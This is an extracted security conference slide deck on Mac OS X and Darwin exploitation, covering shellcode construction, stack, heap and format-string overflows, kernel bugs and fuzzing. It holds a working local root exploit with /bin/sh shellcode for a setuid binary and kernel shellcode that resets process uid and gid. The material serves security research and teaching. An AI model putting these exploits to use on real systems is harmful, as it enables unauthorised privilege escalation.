Breaking Mac Osx

8/13/2019 Breaking Mac Osx

1/71

Breaking Mac OS X

By Neil Archibald

and Ilja van Sprundel


2/71

Who am I? Neil Archibald, Senior

Security Researcher @ Suresec Ltd

Interested in Mac OSX sys-internals

and research for roughly two years.

Introduction

Ilja van Sprundel

Works for Suresec

Working with unix for a few

years.

Breaks stuff for fun and profit :)

Intrigued by operating systeminternals.


3/71

What is Mac OS X?

A modern Operating system

A graphical user interface

Lots of userland applications

Runs on ppc architecture. (will run on intel).

Mac OS X has grown significantly in market share.

OSXserver:/tmp ilja$ uname -aDarwin OSXserver 7.0.0 Darwin Kernel Version 7.0.0: Wed

Sep 24 15:48:39 PDT 2003; root:xnu/xnu-

517.obj~1/RELEASE_PPC Power Macintosh powerpc


4/71

Tools

gdbGnu Debugger,

otoolobjdump and ldd replacement.

class-dumpDump objective c classinfo

IDA Prothe best disassembler around

HTEuseful for manipulating objectfiles.


5/71

Shellcode Tips

Some of the hurdles which a shellcoder

must typically overcome are:

Code must be position independent.

Typically filters exist on the bytes whichare allowed to be used in the shellcode.

(usually a NULL byte is disallowed)

In threaded applications code mustfork()to remain stable.


6/71

PPC Assembly

32 bit instructions. Makes it easy to countoffsets for relative jumps. Makes for largeshellcode.

Endian: little or big endian, typically big. System calls return to the instruction

directly below the sc instruction on

failure, or one instruction past that forsuccess.

PPCExplain++


7/71

Shellcode TipsP.I.C

x86 jmp call pop replacements.Example 1:

Example 2:

bcl 20,31,i_want_this

i_want_this:mflr r3

_main:xor. r5,r5,r5

bnel _mainmflr r30


8/71

Shellcode TipsNULL bytes.

sc instruction = 0x44000002

Reserved bits shown.

It can be replaced with: 0x44ffff02


9/71

Shellcode TipsNULL bytes

nop instruction is recommended as:

ori 0,0,0= 0x60000000

Can be replaced with:ori r0,r3,24672= 0x60606060


10/71

Shellcode TipsNULL bytes

li instruction is really addi with 0 as rA. If the number required in a register is too small

a null byte will occur.

We can add a number to our value to make itlarge enough to avoid null bytes.

We then subtract the same value to leave ourrequired number.


11/71

Shellcode Tips - alignment

Since each instruction is 4 bytes,shellcode must be correctly word aligned

in memory.


12/71

Intel (x86) Architecture

Hopefully you arefamiliar with x86architecture!

Shellcode is prettymuch the same asFreeBSD. In fact, mostFreeBSD shellcode willwork pretty much thesame on osx86 asFreeBSD withoutmodification.


13/71

Mac OSX Intel - Syscall calling convention

The int $0x80 instruction can be used to enterkernel mode to execute a syscall. Also the lcallinstruction can be used.

gcc generally uses lcall. Syscall number in eax. Arguments are passed on

the stack in reverse order.

An extra dummy byte must be pushed to the stack.This is because typically a code stub is used suchas: call kernel:

int $0x80

ret


14/71

Shellcode Tipsfork()

HD Moore release a paperon Mac OS X shellcode.

The execve()functionreturns EOPNOTSUPPif aprocess has more than oneactive thread.

To counter this reliable

shellcode on Mac OS X mustfork()before callingexecve().


15/71

Architecture Spanning Shellcode.

Shellcode which will run on more than onearchitecture.

Applies to Mac OS X, now that the move toIntel is in process.

Phrack article on this subject:http://www.phrack.org/phrack/57/p57-0x0e
http://www.phrack.org/phrack/57/p57-0x0ehttp://www.phrack.org/phrack/57/p57-0x0ehttp://www.phrack.org/phrack/57/p57-0x0ehttp://www.phrack.org/phrack/57/p57-0x0e


16/71

CLDInstruction (Clear Direction Flag). Onlymodifies the direction flag, no memory access. Hasthe op code 0xfcon x86 architecture.

The fnmsubinstruction (floating negative multiply-subtract) on ppc architecture does the following:

frD,frA,frC,frB = -((frA*frC)-frB) -> frD

Therefore also performs no memory access or

changes to significant registers. It has the opcodefnmsub f7,f28,f19,f31 == 0xfcfcfcfc

This means 0xfcfcfcfcwill work as a multi-archNOP instruction between ppc and x86.

Architecture Spanning ShellcodeNOP Sled


17/71

Architecture Spanning ShellcodePPC / x86

Trick: find an instruction on ppc which will donothing, but end in a jump instruction on x86.

Magic Instruction: 0x5f90eb48

X86:5f == pop %edi90 == nop

eb 48 == jmp $0x48 (bytes) PPC:

5f 90 eb 48 == rlwnm r16,r28,r29,13,4


18/71

Architecture Spanning Shellcode.

When execution hitsthis instruction on an

x86 processor, it will

jump 0x48 bytesforward over the ppc

shellcode.

If a ppc processor

interprets thisinstruction is will run

directly into the ppc

code.

5f 90 eb 48

PPC SHELLCODE

X86 SHELLCODE

0x48

Bytes


19/71


20/71

Mach-o format

- Overview

- Header files to read./usr/include/mach-o/*

- Manipulating with HTE

Slides available fromSySCAN05 inreferences.


21/71

Auditing Mac OS X

Open Source Darwin Components

Closed source applications (Most of theGUI).


22/71

Code Auditing

Open source code for the Darwincomponent is available from:

http://developer.apple.com/darwin/

greping for APPLE or XXX can beuseful to find the changes Apple have

made.
http://developer.apple.com/darwin/http://developer.apple.com/darwin/


23/71

Reverse Engineering

IDAAdvanced for PPC/mach-o

class-dump for Objective-C binaries. (OBJsegment).

Phrack (61) paper onreverse engineeringon Mac OSX usinggnu debugger (gdb).


24/71

Debugging Tricks!

- Hidden Functions(GDBComponentList|| CFShow).http://developer.apple.com/technotes/tn2004/tn2124.html#LISTCALLFUNC

MacsBug Environment variables

(MallocStackLogging. Etc)

Antidebug - beating ptrace()protection.
http://developer.apple.com/technotes/tn2004/tn2124.htmlhttp://developer.apple.com/technotes/tn2004/tn2124.html


25/71

Shared Library Redirection

DYLD_FRAMEWORK_PATHColon separatedlist of directories that contain frameworks.

DYLD_LIBRARY_PATHColon deliminated list

of directories containing shared libraries. DYLD_INSERT_LIBRARYInsert a single .so

into the process space. (Requires

DYLD_FORCE_FLAT_NAMESPACE)


26/71

Buffer Overflow (stack)

Hopefully everyone is familiar with the conceptof a stack based buffer overflow on x86architecture.

LR (Link Register)Used for storage of returnaddress.

blr instruction (branch to link register) is theequivalent to the x86 ret instruction.

BUFFER EBP EIP

OVERFLOW


27/71

Buffer Overflow (Stack Layout)

Stack grows downtowards lower memoryaddresses.

When two function callsdeep, LR must bestored somewhere(stack).

Possible to overwritestored LR to gaincontrol.


28/71

Buffer Overflow (return address calculation)

A similar technique to that shown in phrack

(Smashing the stack for fun and profit):

Also the address can be calculated exactly

when stored in an environment variable:

int sp (void) {

__asm__("mr r0, r1");}

unsigned int ret = 0xbffffffa - strlen(shellcode);

char *args[] = { VULNPROG, "-v", "-a", filler, NULL };

char *env[] = {"TERM=xterm", shellcode, NULL };


29/71

Buffer Overflow (fm-iSink.c)#define VULNPROG

"/System/Library/SyncServices/SymbianConduit.bundle/Contents/Resources/mRouter"

#define MAXBUFSIZE 4096

char shellcode[] = // Shellcode by b-r00t, modified by nemo.

"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4"

"\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02"

"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60"

"\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8"

"\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78"

"\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e"

"\x2f\x73\x68";

char filler[MAXBUFSIZE];

int main(int ac, char **av)

{

unsigned int ret = 0xbffffffa - strlen(shellcode);

char *args[] = { VULNPROG, "-v", "-a", filler, NULL };

char *env[] = { "TERM=xterm", shellcode, NULL };

memset(filler,(char)'A',sizeof(filler));

memcpy(filler+MAXBUFSIZE-5,&ret,4);

execve(*args, args,env);

return 0;

}


30/71

Format string bugs(intro)

Introduction (misuse of a function withvariable arguments).

Mac OS X is big endian. Writes are madein the opposite direction to x86.

Exploiting a format string typically givesyou a write anything anywhere primitive.

printf(buffer);


31/71

Format string bugs(__cleanup)

/** Exit, flushing stdio buffers if necessary.

*/

void

exit(status)

int status;

{

struct atexit *p;

int n;

/* Ensure that the auto-initialization routine is linked in: */

extern int _thread_autoinit_dummy_decl;

_thread_autoinit_dummy_decl = 1;

for (p = __atexit; p; p = p->next)for (n = p->ind; --n >= 0;)

(*p->fns[n])();

if (__cleanup)(*__cleanup)();

_exit(status);

}


32/71

Format string bugs(PIC stub)

PIC stubs generated:

Table of function pointers filled in by the dyld.

We can overwrite these function pointers to gain controlof execution,

Note: Address of these function pointers contain nullbytes, which makes writing to them more difficult.

(gdb) x/8i 0x2d40

0x2d40 : mflr r0

0x2d44 : bcl- 20,4*cr7+so,0x2d48

0x2d48 : mflr r11

0x2d4c : addis r11,r11,0

0x2d50 : mtlr r0

0x2d54 : lwzu r12,840(r11)0x2d58 : mtctr r12

0x2d5c : bctr


33/71

Heap Overflow - malloc() Overview

Made up of multiple zones. Most softwareonly uses the default zone.

Different sized allocations come from

different regions or bins. Zone meta-data stored just after the large

memory block bin.

When large memory is allocatedvm_allocate()is used. This eventuallyreaches the zone meta-data.


34/71


35/71

Heap Overflow - continued

The szone_tstruct stored after the large

memory block bin contains function

pointers for each of the zones allocation

and deallocation functions.

If we can overwrite this struct, the next callto any of the heap functions will result in

control of execution.


36/71

Heap OverflowBugs

The WebKit library used by Safari and Mail.appis prone to bugs which can be exploited in thismanner.

Because of the fact that web pages can beprovided by the attacker, calls to malloc() can beorchestrated to cleave the way to the zonestruct.

For full details on this technique read:

http://www.phrack.org/phrack/63/p63-0x05_OSX_Heap_Exploitation_Technqiues.txt


37/71

Race Conditions

File races are common on Mac OSX

Exploited in the same way as other Unixplatforms.

Apple implemented a super stat()function.Without creating an equivalent to operate on an

open file handle.

DESCRIPTION

The getattrlist() function returns attributes (that is, metadata) of file

system objects. You can think of getattrlist()as a seriously enhancedversion of stat(2). The function returns attributes about the file sys-tem object specified bypath in the buffer specified by attrBufandattrBufSize. The attrList parameter determines what attributes are

returned. The options parameter lets you control specific aspects of the

function's behaviour.


38/71

The 80s Called they want their bugs


39/71

The 80 s Called, they want their bugsback!!!!

Low hanging fruit!

dsidentity bug, getenv(USER);??

malloc()bug, MALLOC_LOG_FILE

environment variable.char *envStr = nil;

envStr = getenv("USER");

//check for member of admingroup

if ( (envStr != nil) &&UserIsMemberOfGroup( inDSRef,

inDSNodeRef, envStr, "admin" ) )

{

return true;

}


40/71

dyld bug.static const char* sFrameworkFallbackPaths[] = { "$HOME/Library/Frameworks",

"/Library/Frameworks"

, "/Network/Library/Frameworks", "/System/Library/Frameworks", NULL };static const char* sLibraryFallbackPaths[] = { "$HOME/lib", "/usr/local/lib", "/usr/lib", NULL };

...

// default value for DYLD_FALLBACK_FRAMEWORK_PATH, if not set in environment

if ( sEnv.DYLD_FALLBACK_FRAMEWORK_PATH == NULL ) {

const char** paths = sFrameworkFallbackPaths;

if ( home != NULL ) {

if ( riskyUser() )removePathWithPrefix(paths, "$HOME");

else

paths_expand_roots(paths, "$HOME", home);

}

sEnv.DYLD_FALLBACK_FRAMEWORK_PATH = paths;

}

// default value for DYLD_FALLBACK_LIBRARY_PATH, if not set in environmentif ( sEnv.DYLD_FALLBACK_LIBRARY_PATH == NULL ) {

const char** paths = sLibraryFallbackPaths;

if ( home != NULL ) {

if ( riskyUser() )

removePathWithPrefix(paths, "$HOME");

else

paths_expand_roots(paths, "$HOME", home);

}

sEnv.DYLD_FALLBACK_LIBRARY_PATH = paths;}


41/71

Return to libSystem

Most people run softwareupdate` regularly,therefore most people are running the exactsame binaries. This makes returning into thebinary itself reliable.

Calling convention: Function arguments arepassed in the general purpose registers, startingwith r3.

otool tv can be used to dump anassembly listing of a binary. To find instructionswhich are needed.


42/71

Return to libSystem

The lmw instruction is most useful, however itis very rare to find this instruction in a binary,starting loading from the r3, register.

An example of some instructions which we coulduse are:

getusershell()will store the shell of the currentuser in r3.

// [/usr/lib/libSystem.B.dylib]

//9001b88c lwz r3,0x38(r1)

//9001b890 addi r1,r1,0x60

//9001b894 lwz r0,0x8(r1)

//9001b898 lmw r29,0xfff4(r1)

//9001b89c mtspr lr,r0

//9001b8a0 blr


43/71

What is Darwin?

A part of Mac OS X

An operating system on itself

Unix based

Userland applications and a

kernel

Runs on ppc and i386


44/71


45/71


46/71


47/71

Example ifr.ifr_name

doesnt getinitialized.

strcpy()leaves

part of ifr_nameuninitialized.

Data is

copyout()d touserspace.

static int ifconf(u_long cmd, user_addr_t ifrp, int * ret_space) {

struct ifaddr *ifa;

struct ifreq ifr;

...

space = *ret_space;

for (ifp = ifnet_head.tqh_first; space > sizeof(ifr) && ifp;

ifp = ifp->if_link.tqe_next) {

char workbuf[64];

size_t ifnlen, addrs;

ifnlen = snprintf(workbuf, sizeof(workbuf),

"%s%d", ifp->if_name, ifp->if_unit);

...

strcpy(ifr.ifr_name, workbuf);...

ifa = ifp->if_addrhead.tqh_first;

for ( ; space > sizeof (ifr) && ifa;

ifa = ifa->ifa_link.tqe_next) {

struct sockaddr *sa = ifa->ifa_addr;

addrs++;

if (sa->sa_len


48/71


49/71

Stack based buffer overflows in the darwin kernel.

There are a few

The same rules apply (mentioned earlier)

A few differences when comparing toexploiting them in userland.

The goal is the same, get a shell withelevated privileges.

Stack based buffer overflows in the


50/71


darwin kernel: kernel shellcode

Unlike userland shellcode, we cannot just callexecve().

We can change the user id and group id of aprocess.

Each process has its own process structuresomewhere in memory.

Among other things it stored the userid and

groupid. All our shellcode has to do is find this struct and

modify the uid and gid.



51/71


darwin kernel: kernel shellcode (2)

Finding the process structure of a processis easier than you would think.

This can be done with the sysctl() call

before you exploit anything.long get_addr(pid_t pid) {

int i, sz = sizeof(struct kinfo_proc),

mib[4];

struct kinfo_proc p;

mib[0] = 1;

mib[1] = 14;

mib[2] = 1;

mib[3] = pid;

i = sysctl(&mib, 4, &p, &sz, 0, 0);

if (i == -1) {

perror("sysctl()");

exit(0);

}

return(p.kp_eproc.e_paddr);}


52/71



53/71


darwin kernel: kernel shellcode (4)

Basic darwin kernel shellcode:

Int kshellcode[] = {

0x3ca0aabb, // lis r5, 0xaabb

0x60a5ccdd, // ori r5, r5, 0xccdd

0x80c5ffa8, // lwz r6, -88(r5)

0x80e60048, // lwz r7, 72(r6)

0x39000000, // li r8, 0

0x9106004c, // stw r8, 76(r6)

0x91060050, // stw r8, 80(r6)0x91060054, // stw r8, 84(r6)

0x91060058, // stw r8, 88(r6)

0x91070004 // stw r8, 4(r7)

}

Address obtained with sysctl


54/71


55/71



56/71


darwin kernel: The vulnerability. There is a length check done

on nsops. Nsops is signed howeverthere is no check to see if itsnegative.

Copyin() copies data fromuserland to kernel space.

First argument is a userlandaddress. Second argument is a kernel

address.

Third argument is the size. The size used will be

interpreted as unsigned. When negative values are

cast to unsigned they areHUGE!!!

Hence a buffer overflow cantake place.

struct semop_args {

int semid;

struct sembuf *sops;int nsops;

};

int

semop(p, uap, retval)

struct proc *p;

register struct semop_args *uap;register_t *retval;

{

int semid = uap->semid;

int nsops = uap->nsops;

struct sembuf sops[MAX_SOPS];

...

if (nsops > MAX_SOPS) {

UNLOCK_AND_RETURN(E2BIG);}

if ((eval = copyin(uap->sops, &sops,

nsops * sizeof(sops[0]))) != 0) {

UNLOCK_AND_RETURN(eval);

}

...}



57/71

Stack based buffer overflows in thedarwin kernel: copyin problem

Problem, were copying WAY too much andstack space will run out eventually.

Copyin() however does several tests on the

userland address. One of them is to stop copying the moment data

can no longer be read from it.

This can be used to our advantage.

Well copy the amount of data needed and thenhave an unreadable page, right after it!

Kernel bugs allowing userland


58/71

Kernel bugs allowing userlandcompromise.

Not all bugs in the kernel are exploitedonly in the kernel.

Some require userland interaction.

Examples: a few ptrace() exploits. FD0,1,2 closing bugs,


59/71



60/71

g gcompromise. setrlimit() (2)

int dosetrlimit(p, which, limp)

struct proc *p;

u_int which;

struct rlimit *limp;

{

register struct rlimit *alimp;

...

alimp = &p->p_rlimit[which];

if (limp->rlim_cur > alimp->rlim_max ||

limp->rlim_max > alimp->rlim_max)

if (error = suser(p->p_ucred, &p->p_acflag))

return (error);

...

switch (which) {

...

case RLIMIT_NOFILE:

/*

* Only root can set the maxfiles limits, as it is

systemwide resource

*/

if ( is_suser() ) {

if (limp->rlim_cur > maxfiles)

limp->rlim_cur = maxfiles;

if (limp->rlim_max > maxfiles)

limp->rlim_max = maxfiles;

}

else {if (limp->rlim_cur > maxfilesperproc)

limp->rlim_cur = maxfilesperproc;

if (limp->rlim_max > maxfilesperproc)

limp->rlim_max = maxfilesperproc;

}

break;

...

}

}



61/71


All values used are signed Negative rlimits can be used

Will pass all super user checks

When comparisons are done in other pieces ofcode out there is always unsigned cast.

We can open a lot more files then initiallyintended (there is still a system limit that will be

enforced !) A denial of service using dup2() is possible

Getdtablesize() will return a negative value.



62/71


Getdtablesize() returns the

maximum amount of filedescriptors that a processcan have open.

A lot of programs use this ina for() loop to close all openfile descriptors beforespawning another process.

One of these is pppd whichis suid root and opens a lot

of interesting files. File descriptors and rlimits

get inherited throughexecve().

intgetdtablesize(p, uap, retval)

struct proc *p;

void *uap;

register_t *retval;

{

*retval = min((int)p-

>p_rlimit[RLIMIT_NOFILE].rlim_cur,

maxfiles);

return (0);}


63/71


64/71


65/71

What is fuzzing

Using semi-valid data: good enough topass initial checks, bad enough so thingsmight go wrong.

Can be used in a lot of things Well only discuss fuzzing related to the

xnu kernel.

What can you fuzz: Syscall arguments Binary files the kernel has to process


66/71

Syscall argument fuzzing

Generate a random syscall number OSX also has some negative syscall numbers. All syscalls have at most 8 arguments (special

case: one mach syscall has 9 arguments)

Generate 8 random arguments random:

Some random number A valid userland address

Get some (random) data on it Address of an unmapped page


67/71

More detailed argument fuzzing

The previous method is trivial and not detailed atall, bug can be implemented in a matter of

minutes.

You can do more detailed syscall fuzzing Examples

socket() fuzzing Once the socket is made then all sorts of socket operations

are made on it. Setsockopt

Getsockopt

Bind


68/71

Binary file fuzzing

Unintelligent file fuzzing Take a valid file Randomly modify some bytes VERY EASY

SHOCKING RESULTS Intelligent fuzzing Can take a while to make something decent Need to know the specifics of the kind of file parsing that youre

going to fuzz.

What can you fuzz with it: Mach-o runtime .dmg image file loading

You should check out Michael Sutton and AdamGreenes slides from blackhat.


69/71

MYTHBUSTERS

OSX is super securebecause is has no rootuser!

To gain root on an OSX

machine the user needs toenter his/her password!

OSX has a magicalprotective barrier whichmakes it impossible to beinfected by a virus!

No Mac OSX box has everbeen hacked!


70/71

References

http://en.wikipedia.org/wiki/PowerPC

http://felinemenace.org/~nemo/ppcasm/

http://uninformed.org/?v=1&a=1&t=pdf

http://developer.apple.com/darwin/
http://en.wikipedia.org/wiki/PowerPChttp://felinemenace.org/~nemo/ppcasm/http://uninformed.org/?v=1&a=1&t=pdfhttp://developer.apple.com/darwin/http://developer.apple.com/darwin/http://uninformed.org/?v=1&a=1&t=pdfhttp://felinemenace.org/~nemo/ppcasm/http://en.wikipedia.org/wiki/PowerPC


71/71

Breaking Mac Osx

Documents

Transcript of Breaking Mac Osx